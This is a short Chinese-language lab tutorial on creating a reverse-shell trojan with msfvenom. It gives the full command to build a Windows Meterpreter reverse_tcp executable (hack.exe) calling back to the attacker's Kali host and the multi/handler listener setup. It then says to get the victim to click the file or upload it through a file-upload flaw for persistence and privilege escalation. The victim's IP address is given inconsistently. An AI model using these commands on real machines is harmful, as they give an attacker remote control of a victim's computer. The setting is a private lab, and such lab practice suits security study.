msfvenom生成反弹shell
实验环境:攻击机器 kali 192.168.43.90 (利用msfvenom 生成一个hack.exe反弹shell的木马)
受害者机器 xp 32位 192.168.43.92
1、先查找使用的具体语句
可以先进入msf中利用search 进行搜索具体的使用语句(payload/windows/meterpreter/reverse_tcp 默认是攻击x86的windows机器,如需要攻击x64的windows机器可以利用payload/windows/x64/meterpreter/reverse_tcp,本次攻击的是)
msf5 > search meterpreter/reverse_tcp
2、利用msfvenom 生成一个hack.exe反弹shell的木马
root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.90 LPORT=4444 -f exe -o hack.exe
其中LHOST是攻击发起者的IP,LPORT是受害者将要连接的攻击者打开的端口
3、再再kali里面打开一个窗口,利用multi/handler进行监听来自受害者192.168.43.11的反弹过来的shell
msf5> use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST=192.168.43.90
set LPORT=4444
监听等待
(后续发现前面生成的4444端口的hack.exe有点问题,就重新用55555端口的重新生成了一个)
4、把hack.exe发送给受害者进行点击(或者利用文件上传进行上传上去,并执行,用于权限维持和提权)